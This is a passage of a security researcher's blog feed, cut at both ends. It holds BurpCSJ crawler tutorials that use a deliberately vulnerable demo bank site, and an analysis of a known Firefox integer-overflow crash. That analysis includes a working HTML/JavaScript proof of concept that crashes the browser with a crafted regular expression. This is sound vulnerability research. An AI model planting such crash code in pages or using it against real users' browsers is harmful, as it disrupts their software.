Hope you enjoyed the post - I am sure there are other vulnerabilities in this product. If you find them, please let me know.Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com2tag:blogger.com,1999:blog-5593108060941425908.post-63615887713817832712014-08-29T10:45:00.000+02:002014-08-29T10:45:15.952+02:00BurpCSJ - Dealing with authenticationI have received many questions on how to properly handle authentication when using <a href="https://github.com/malerisch/burp-csj">BurpCSJ</a>, so here is a short tutorial on how to properly manage authentication. If you are looking for how to use this <a href="http://portswigger.net/burp/">Burp</a> extension, here is a <a href="http://blog.malerisch.net/2013/09/burpcsj-tutorial-using-crawljax.html">basic tutorial</a> as well.<br />
<br />
In this post, we are going to use BurpCSJ against the Altoro bank (vulnerable web application made on purpose), which is available online here: <a href="http://demo.testfire.net/">http://demo.testfire.net/</a><br />
<br />
First, start clean (the reasons will be clear at the end of this tutorial):<br />
<br />
- Start Burp;<br />
- Start browser and configure proxy settings to work with Burp;<br />
- Browse to target site: <a href="http://demo.testfire.net/">http://demo.testfire.net/</a><br />
- Perform login: user: jsmith - password: Demo1234<br />
- Check Burp cookie jar (under options/sessions), this should be populated with some cookies:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfQHZEkJQDZfNBYzJz9295zAWNrV5TpJgwqi3K9N5FHlsnFQxoa6VWxc4v5YagtVL8tUpU_X-sH4-n015Vgedlr8b9LTfssDFxxmWVK6czw8jS8N_ISlAOtgYex2SpMr5LZuwVcmDVQqU/s1600/valid-session.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfQHZEkJQDZfNBYzJz9295zAWNrV5TpJgwqi3K9N5FHlsnFQxoa6VWxc4v5YagtVL8tUpU_X-sH4-n015Vgedlr8b9LTfssDFxxmWVK6czw8jS8N_ISlAOtgYex2SpMr5LZuwVcmDVQqU/s1600/valid-session.png" height="222" width="320" /></a></div>
<br />
- Configure BurpCSJ (Crawljax tab) and make sure that "Use Manual Proxy" is ticked and it is pointing to Burp and that the "Use cookie jar" option is ticked as well:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtI7fJ4a0P7VlgQY6Qp1V80ATjfPQjVonuZuHra2C4wawjsolo8MQZsyfTmHNEaMM10TbDyQAaChIiuuJOvMriEb9dAvhGo1pUxkuV5u-8tY45nH0drqOkcLuRr6TRkC12IsIS6cWjEJw/s1600/burp-csj-options.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtI7fJ4a0P7VlgQY6Qp1V80ATjfPQjVonuZuHra2C4wawjsolo8MQZsyfTmHNEaMM10TbDyQAaChIiuuJOvMriEb9dAvhGo1pUxkuV5u-8tY45nH0drqOkcLuRr6TRkC12IsIS6cWjEJw/s1600/burp-csj-options.png" /></a></div>
<br />
<br />
-
Start/Launch BurpCSJ against target site (right-click, Send URL to crawljax option). When BurpCSJ launches <a href="http://crawljax.com/">Crawljax</a>, you will notice that the first request has no "cookie" - this is normal in WebDriver and the reason why this occurs is that <a href="http://docs.seleniumhq.org/docs/03_webdriver.jsp#cookies">WebDriver needs to first initialize</a>, so no worries.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdnWIC5HQLbqTONuV8tLTh4HQSLlTaRfQCk4xEatr-iT-vZtiqieXB-BpRZreuGY2Z7qsXu8Cyo02TWYp60mwPYNp8t3nrXC6BuQ8upr-IQ8ae8o6z9hhpdq8uImvCHDdTTKdjl5iNPls/s1600/1st-request-withoutcookie.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdnWIC5HQLbqTONuV8tLTh4HQSLlTaRfQCk4xEatr-iT-vZtiqieXB-BpRZreuGY2Z7qsXu8Cyo02TWYp60mwPYNp8t3nrXC6BuQ8upr-IQ8ae8o6z9hhpdq8uImvCHDdTTKdjl5iNPls/s1600/1st-request-withoutcookie.png" /></a></div>
<br />
<br />
-
the second request, or third request (depending if there is a redirection) and all the subsequent requests performed by Crawljax will include the valid cookies from the cookie jar.<br />
<br />
You are now performing an authenticated crawling session and if you check the browser managed by WebDriver, you should notice that it is using a valid authenticated session.<br />
<br />
In case you do not follow the first two steps, you might end up having some issues and failing to run a proper authenticated crawling session. This happened to me quite few times...<br />
<br />
Let's say that you already started the browser, logged in and then you enable proxy with Burp and then you run BurpCSJ. The issue is that Burp does not have history of the Set-Cookie directive so it will identify the cookies sent by the browser and will populate the Cookie jar by taking as a reference the <b>parent domain </b>only.<br />
<br />
Below, you can see the issue by comparing the cookies in the browser and the ones in the Burp cookie jar. Can you spot the difference? ;-)<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj53tCwDcOnOiR01qAHtHRl9qHVQqLsDCEpYkTTQ2pOZO8QqH0nvNRb46W2GtUyK8-0fO3fMzqNtBSFfxSS3qSp1ZrDQ1SRLffcY3W_7HnLGQZ_W1_ldgLTmf7YVTKhc3QKtbQrHPYPgbs/s1600/burp-cookiejar-mismatch-topublish.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj53tCwDcOnOiR01qAHtHRl9qHVQqLsDCEpYkTTQ2pOZO8QqH0nvNRb46W2GtUyK8-0fO3fMzqNtBSFfxSS3qSp1ZrDQ1SRLffcY3W_7HnLGQZ_W1_ldgLTmf7YVTKhc3QKtbQrHPYPgbs/s1600/burp-cookiejar-mismatch-topublish.png" /></a><br />
<br />
If this happens, a BurpCSJ crawling against demo.testfire.net would not use the
cookies in the Burp cookie jar, as demo.testfire.net doesn't match with
testfire.net. So no authenticated crawling session in this case...<br />
<br />
So don't be lazy, if you have to restart/clean the browser time to time... ;-)<br />
<br />
The latest Crawljax package
has fixed multiple issues. I have noticed the crawler is more diligent
and sticks to the target domain instead of visiting other pages from out-of-scope domains.<br />
<br />
As usual, feedback is more than welcome and feel to contact me or raise github issues - <a href="https://github.com/malerisch/burpcsj">https://github.com/malerisch/burpcsj</a>Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com3tag:blogger.com,1999:blog-5593108060941425908.post-43099499302632106072013-12-18T09:32:00.000+01:002013-12-18T09:32:37.989+01:00Crashing Firefox with Regular ExpressionRecently, I have found an interesting crash in Firefox and decided to investigate more. So I decided to Google for it and it appears that the issue is already <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=872971">known</a> and was reported few months ago to Mozilla.<br />
However, the bug is <b>not</b> fixed yet (at least in FF 26) and as a matter of personal exercise, I have decided to dig a little deeper and collect some notes which I am sharing in this blog post. <br />
Here is a brief analysis of what I have found, thanks also to the pointers given from my friend <a href="http://www.signal11.eu/en/research/">Andrzej Dereszowski</a>. <br />
<br />
This is the crash PoC:<br />
<br />
<i><span style="font-family: Courier New, Courier, monospace;"><html></span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"><head></span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"><br /></span></i>
<i><span style="font-family: Courier New, Courier, monospace;"><script></span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;">function main() {</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;">regexp = /(?!Z)r{2147483647,}M\d/;</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;">"A".match(regexp);</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;">}</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"><br /></span></i>
<i><span style="font-family: Courier New, Courier, monospace;">main();</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"></script></span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"></head></span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"><body></span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"></body></span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"></html></span></i><br />
<br />
<br />
Below, a windbg screen shot showing the crash on Firefox 25 / Windows 8.1 (64bit):<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsJHOu9C443K2dTXs0hVPqZPjLbkVFauZWO6L2VWPu5Lf9Z1gxnVTAPvOwHSPIB46R3oCOAzKA2ilG_eKSBSLrkGsfK7YZof7Hu-fGvOXRdUaFS_ULxY4Svm9boV6a9VldW2sU7ptsZmc/s1600/initial-crash1.png" imageanchor="1"><img border="0" height="442" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsJHOu9C443K2dTXs0hVPqZPjLbkVFauZWO6L2VWPu5Lf9Z1gxnVTAPvOwHSPIB46R3oCOAzKA2ilG_eKSBSLrkGsfK7YZof7Hu-fGvOXRdUaFS_ULxY4Svm9boV6a9VldW2sU7ptsZmc/s640/initial-crash1.png" width="640" /></a><br />
<br />
At this stage, we can infer that an overflow occurred and as a measure of protection FF decided to crash instead of gracefully handle the issue. In my PoC, you can see already the integer <i>2147483647</i> which is used in a regular expression.<br />
<br />
In the call stack, there are functions dealing with the RegExp just before the mozjs!WTF::CrashOnOverflow::overflowed: . Let's put a breakpoint on the previous function: mozjs!JSC::Yarr::YarrGenerator<1>::generatePatternCharacterFixed+0x87 and see what happens just before the overflow is identified.<br />
<br />
This is the function where we are setting the breakpoint (bp) on:<br />
<br />
<i><span style="font-family: Courier New, Courier, monospace;">void generatePatternCharacterFixed(size_t opIndex)</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> {</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> YarrOp& op = m_ops[opIndex];</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> PatternTerm* term = op.m_term;</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> UChar ch = term->patternCharacter;</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"><br /></span></i>
<i><span style="font-family: Courier New, Courier, monospace;"> const RegisterID character = regT0;</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> const RegisterID countRegister = regT1;</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"><br /></span></i>
<i><span style="font-family: Courier New, Courier, monospace;"> move(index, countRegister);</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> sub32(Imm32(term->quantityCount.unsafeGet()), countRegister);</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"><br /></span></i>
<i><span style="font-family: Courier New, Courier, monospace;"> Label loop(this);</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> BaseIndex address(input, countRegister, m_charScale, (Checked<int>(term->inputPosition - m_checked + Checked<int64_t>(term->quantityCount)) * static_cast<int>(m_charSize == Char8 ? sizeof(char) : sizeof(UChar))).unsafeGet());</span></i><br />
<br />
The bp is set on the BaseIndex address() part. This is where some checks are performed on our integer.<br />
<br />
After stepping through different checks, our integer (<i>2147483647</i>) is stored in both lhs and rhs and then lhs and rhs are summed together. The sum is then stored in the "result" variable, as shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI9OcyXW2h-dcEyMenQmfGAKPAHgFbWQZm-Sio6PqpWVTxBCarHdg5xUz9lMBKi-y26BVh9-7Y0MI8M8fzG30_P7ug0j2Be-f83iI1AVdstlzRGWDtxuJBnQwEbTSw-m4-upi38GSKlU4/s1600/s1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="102" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI9OcyXW2h-dcEyMenQmfGAKPAHgFbWQZm-Sio6PqpWVTxBCarHdg5xUz9lMBKi-y26BVh9-7Y0MI8M8fzG30_P7ug0j2Be-f83iI1AVdstlzRGWDtxuJBnQwEbTSw-m4-upi38GSKlU4/s640/s1.png" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
The addition of lhs and rhs is <i>4294967294 </i>(0xFFFFFFFE) which is stored in an int64. Following that, a further check is performed, as shown below:<br />
<br />
<i><span style="font-family: Courier New, Courier, monospace;"> template <typename U> Checked(const Checked<U, OverflowHandler>& rhs)</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> : OverflowHandler(rhs)</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> {</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> if (!isInBounds<T>(rhs.m_value))</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> this->overflowed();</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> m_value = static_cast<T>(rhs.m_value);</span></i><br />
<i><span style="font-family: Courier New, Courier, monospace;"> }</span></i><br />
<br />
<div>
Within the isInBounds check (in the screen shot below), the minimum value is 0x80000000 and the maximum value is 0x7FFFFFFF, which means between -2147483648 and 2147483647, the range of a long.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFrigysUjnQmjR-TioAIIX6JVOHmP_hvmPMdVnAPDs4CqfhVjS6wpQD7NDRBpeQ2SxrE-DMnC0PcBMc2z5rqb1Q9upkKhwsTylr_yZEYn4aDUd3PlTzPiJXhdnekUDCUd9srTvz2Vo4ZI/s1600/max-value.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFrigysUjnQmjR-TioAIIX6JVOHmP_hvmPMdVnAPDs4CqfhVjS6wpQD7NDRBpeQ2SxrE-DMnC0PcBMc2z5rqb1Q9upkKhwsTylr_yZEYn4aDUd3PlTzPiJXhdnekUDCUd9srTvz2Vo4ZI/s1600/max-value.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
The rhs.m_value is now <i>4294967294</i> (0xFFFFFFFE) as result of the previous arithmetic operation between lhs and rhs.</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihi5KhMDmbkc4ndeYlhTxtNO0qPxSOMweemIO-bpBdeVJek87NFisAA-JoKCbYmA51cNkD-bzE7otzDF-JPQZznSDOCBxXMCZfT58yr40l4vgHMUOkQxgeo7vnPoLHqDl-UB6U-7I9DYI/s1600/s3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihi5KhMDmbkc4ndeYlhTxtNO0qPxSOMweemIO-bpBdeVJek87NFisAA-JoKCbYmA51cNkD-bzE7otzDF-JPQZznSDOCBxXMCZfT58yr40l4vgHMUOkQxgeo7vnPoLHqDl-UB6U-7I9DYI/s640/s3.png" width="640" /></a></div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<br /></div>
<div>
This triggers the check as 0xFFFFFFFE is greater than 0x7FFFFFFF (max value in the inBounds check). This would call overflowed() which would then simply crash FF.</div>
Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com0tag:blogger.com,1999:blog-5593108060941425908.post-34216321887045261972013-09-09T23:29:00.000+02:002014-08-29T16:07:34.728+02:00BurpCSJ extension releaseAs part of my research and talk titled "<a href="http://www.slideshare.net/robertosl81/augmented-reality-in-your-web-proxy">Augmented Reality in your web proxy</a>" presented during the <a href="https://appsec.eu/program/hackpra-allstars/">HackPra AllStars program</a> / <a href="https://appsec.eu/">OWASP AppSec EU 2013</a> security conference in Hamburg, I decided to release a new <a href="http://portswigger.net/burp/editions.html">Burp Pro</a> extension which integrates <a href="http://www.crawljax.com/">Crawljax</a>, <a href="http://docs.seleniumhq.org/">Selenium</a> and <a href="http://junit.org/">JUnit</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
I decided to take this approach to increase application spidering coverage (especially for Ajax web apps), speed up complex test-cases and take advantage of the <a href="http://portswigger.net/burp/extender/">Burp Extender API</a>.</div>
<br />
<b>Downloads</b><br />
<ul>
<li>BurpCSJ extension JAR - <a href="http://bit.ly/burpcsj0-2">download</a> (all dependencies included)</li>
<li>BurpCSJ source code - <a href="https://github.com/malerisch/burp-csj">github</a><br />
</li>
<li>"Augmented Reality in your web proxy" - <a href="http://www.slideshare.net/robertosl81/augmented-reality-in-your-web-proxy">presentation</a> (slideshare)</li>
</ul>
<div>
<b>Getting started</b></div>
<div>
<ol>
<li><a href="http://bit.ly/burpcsj0-2">Download BurpCSJ</a>;</li>
<li>Load BurpCSJ extension jar via the Extender tab;</li>
<li>Choose the URL item from any Burp tab (e.g. target, proxy history, repeater); </li>
<li>Right click on the URL item;</li>
<li>Choose menu item "Send URL to Crawljax";</li>
<li>Crawljax will automatically start crawling the URL that you choose.</li>
</ol>
</div>
<div>
<b>Tutorials</b></div>
<div>
<br /></div>
<div>
- <a href="http://blog.malerisch.net/2013/09/burpcsj-tutorial-using-crawljax.html">BurpCSJ tutorial - Using Crawljax</a></div>
<div>
<br /></div>
<div>
<b>Screenshots</b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbf9gvdPEninZUV7-kKNZsNUaZrO0XvadvNFDnKuhoZA4DJZRYIcNGvE8qLXs1bikoOX5HF3LUJiqEl1LCsl5sSZX4nvZRQg5l1bMgEZ_LZwQFhFEv69C_5UP9_NA56-aH1cIInxNHa60/s1600/burp-csj1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbf9gvdPEninZUV7-kKNZsNUaZrO0XvadvNFDnKuhoZA4DJZRYIcNGvE8qLXs1bikoOX5HF3LUJiqEl1LCsl5sSZX4nvZRQg5l1bMgEZ_LZwQFhFEv69C_5UP9_NA56-aH1cIInxNHa60/s200/burp-csj1.png" height="170" width="200" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivkeGJO07s8LelWSRHqYdvfjd6T2_hRdgSFHTHxFXtxsGYS6DHjcVJH6QnnxZsXhj7jeytcf9nDGLZvXiJtUtH-DtNnNWV51Ppscf4MD_I9DGU09tXcNN8wffQ7k309PNmPDA_tZeZmN4/s1600/burp-csj2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivkeGJO07s8LelWSRHqYdvfjd6T2_hRdgSFHTHxFXtxsGYS6DHjcVJH6QnnxZsXhj7jeytcf9nDGLZvXiJtUtH-DtNnNWV51Ppscf4MD_I9DGU09tXcNN8wffQ7k309PNmPDA_tZeZmN4/s320/burp-csj2.png" height="91" width="320" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Videos</b></div>
<div>
<br /></div>
BurpCSJ extension in action:<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/x51jwZ1HV9E?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/X3mjheLJEFE?feature=player_embedded' frameborder='0'></iframe><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/mKOD3ysiN-U?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
<br />
<br />
<br />Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com4tag:blogger.com,1999:blog-5593108060941425908.post-75199492908620183722013-09-09T23:08:00.000+02:002015-02-09T22:26:50.767+01:00BurpCSJ Tutorial - Using CrawljaxThis is a simple tutorial to get you started with BurpCSJ and Crawljax.<br />
<br />
Installation is easy - just <a href="http://bit.ly/burpcsj0-3">download</a> the BurpCSJ and import it in Burp via the extender tab, as shown below:<br />
<br />
Extender -> Add -> Choose File<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdXBgOpopmWT5TVqSIFJbi-00qYHZ63WJv36115opa__e2N1iFZWzBp-LO_72ck_m0qhFvh93D1H7qKdvf5-yhPO7OnMlr41-09FInjh3cmzOyzx__4IHW6-APKj4auSUeYLKHAP0zFi8/s1600/s1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdXBgOpopmWT5TVqSIFJbi-00qYHZ63WJv36115opa__e2N1iFZWzBp-LO_72ck_m0qhFvh93D1H7qKdvf5-yhPO7OnMlr41-09FInjh3cmzOyzx__4IHW6-APKj4auSUeYLKHAP0zFi8/s320/s1.png" height="139" width="320" /></a></div>
<br />
<br />
Once the extension is loaded, two new tabs will appear on the right side:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhe9dbMkBErR0DFVXdHnuWQMjyKCUEbBkuTBSi6rfPd3k4EyqNUUzXITJz7OmNrfw4cijs0iEu7icHjcvdiSSQ34Vw1BEzVxloN0Et6SQbnxRS4TIo_12R8G0SzY_7OLuPX7KQnVj-_Cc/s1600/s2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhe9dbMkBErR0DFVXdHnuWQMjyKCUEbBkuTBSi6rfPd3k4EyqNUUzXITJz7OmNrfw4cijs0iEu7icHjcvdiSSQ34Vw1BEzVxloN0Et6SQbnxRS4TIo_12R8G0SzY_7OLuPX7KQnVj-_Cc/s320/s2.png" height="168" width="320" /></a></div>
<br />
<br />
<b style="line-height: 25px;">Start crawling</b><br />
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;">To start crawling, grab an URL item from any Burp tab (e.g. proxy history), right-click on the item and choose "Send to URL to Crawljax", as shown below:</span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjfpNp5UcmVTkOV7veWGiI46YNHMWowJmXHaW_wdKvTqmWN9CmGoa0Q9_mluFqM05X8oDQlvyZN9MigTeYgABDnN_vu-V0Exdw6coC_S09nm1CYUHshbHM0L8Jd7yDw1wCuwvKBmDvwbY/s1600/s4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjfpNp5UcmVTkOV7veWGiI46YNHMWowJmXHaW_wdKvTqmWN9CmGoa0Q9_mluFqM05X8oDQlvyZN9MigTeYgABDnN_vu-V0Exdw6coC_S09nm1CYUHshbHM0L8Jd7yDw1wCuwvKBmDvwbY/s320/s4.png" height="320" width="229" /></a></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;">After this, Crawljax session will start based on settings configured via the Crawljax tab.</span></div>
<div>
<span style="line-height: 25px;">It is always recommended to choose a web root URL item for Crawljax e.g. http://yoursite.xxx/ instead of a specific page or folder. This is typically the URL that you have configured under Target/Scope in Burp.</span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<b>Crawling with a different browser</b><br />
<br />
Under the Crawljax tab, it possible to configure the path to the browser drivers, proxy settings and other options for Crawljax.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMMbOGoXLMIPEdaKyHa8HmF42W5Lvc_oMe-M7QgBpQxTkDZdtFlCHa4qYRxTusLSNkqY5TBrR6usUKJvsSO44qLDUoFF10Alpqyqm-zicDEKZvry6V-L0BNUSf3j0o1Dc7uhC9Iej68C8/s1600/s3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMMbOGoXLMIPEdaKyHa8HmF42W5Lvc_oMe-M7QgBpQxTkDZdtFlCHa4qYRxTusLSNkqY5TBrR6usUKJvsSO44qLDUoFF10Alpqyqm-zicDEKZvry6V-L0BNUSf3j0o1Dc7uhC9Iej68C8/s320/s3.png" height="320" width="272" /></a></div>
<br />
<span style="font-family: inherit;">If you need to use a different browser with Crawljax, then you would need to add the relevant drivers or executables:</span><br />
<ul style="line-height: 25px; margin: 15px 0px; padding: 0px 0px 0px 30px;">
<li><span style="font-family: inherit;">Chrome driver: <a href="https://code.google.com/p/chromedriver/downloads/list" style="text-decoration: none;">https://code.google.com/p/chromedriver/downloads/list</a></span></li>
<li><span style="font-family: inherit;">IE Driver: <a href="https://code.google.com/p/selenium/downloads/list" style="text-decoration: none;">https://code.google.com/p/selenium/downloads/list</a></span></li>
<li>PhantomJS: <a href="http://phantomjs.org/download.html">http://phantomjs.org/download.html</a></li>
</ul>
<div>
<span style="line-height: 25px;">In this example, let's use the Chrome driver:</span></div>
</div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU-DN6SkbdhJJyivPCCxVhtcXCqLbKTUulYzHJLX8ZR4IEPORX_w2fL308PB4Vc4NkR5hW23vN7FwJr9uPYnsmQhVCp6bL6usrRht3j5NXoZoFXj1h7W-z0zLddUQd1k_7keT-jtTbEgA/s1600/s5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU-DN6SkbdhJJyivPCCxVhtcXCqLbKTUulYzHJLX8ZR4IEPORX_w2fL308PB4Vc4NkR5hW23vN7FwJr9uPYnsmQhVCp6bL6usrRht3j5NXoZoFXj1h7W-z0zLddUQd1k_7keT-jtTbEgA/s320/s5.png" height="233" width="320" /></a></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyjfHrtfigPnyxvbRFUABcXsiYPtyn-YO31LhHwg8hHibPcd5kuZpZ5Up6I3Q-mixPiRIIiFIFRAEd2DaolVtFH8reBYMT5N1PEJJjBLvZHHWbDM7G72Hr_LEqLC3QfyRbsYsmp53RzwU/s1600/s6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyjfHrtfigPnyxvbRFUABcXsiYPtyn-YO31LhHwg8hHibPcd5kuZpZ5Up6I3Q-mixPiRIIiFIFRAEd2DaolVtFH8reBYMT5N1PEJJjBLvZHHWbDM7G72Hr_LEqLC3QfyRbsYsmp53RzwU/s1600/s6.png" /></a></div>
<div>
<span style="line-height: 25px;">Once chrome is selected, then you can start Crawljax with Chrome as described in the previous step.</span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;"><b>Crawling application with login/authentication</b></span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;">If you are testing a web application with a login/authentication then it is recommended to use Burp cookie jar. This option allows BurpCSJ to pass cookies to Crawljax when crawling a site. If you already have session tokens in the cookie jar, then BurpCSJ will use those.</span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuQqWaVAi0_QTG2bx76lmw8PcSLoGFN4OyAw-o4VUecx4x1YA5UAa73s43ScNT4NnHyGvtHrnlIWZEdC0_KAfTdAM0Ha3YLef8_yOksTN22t427K52pf2D5U5lhQ8Io6W9TcrmLNIKcKo/s1600/s7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuQqWaVAi0_QTG2bx76lmw8PcSLoGFN4OyAw-o4VUecx4x1YA5UAa73s43ScNT4NnHyGvtHrnlIWZEdC0_KAfTdAM0Ha3YLef8_yOksTN22t427K52pf2D5U5lhQ8Io6W9TcrmLNIKcKo/s1600/s7.png" /></a></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<b style="line-height: 25px;">Exclusion list</b></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div>
<span style="line-height: 25px;">The exclusion list allows to filter out unwanted pages, such as logout or signoff. More entries would be needed for complex applications, such as admnistrative interfaces where crawling might actually change or modify the application state.</span></div>
<div>
<span style="line-height: 25px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
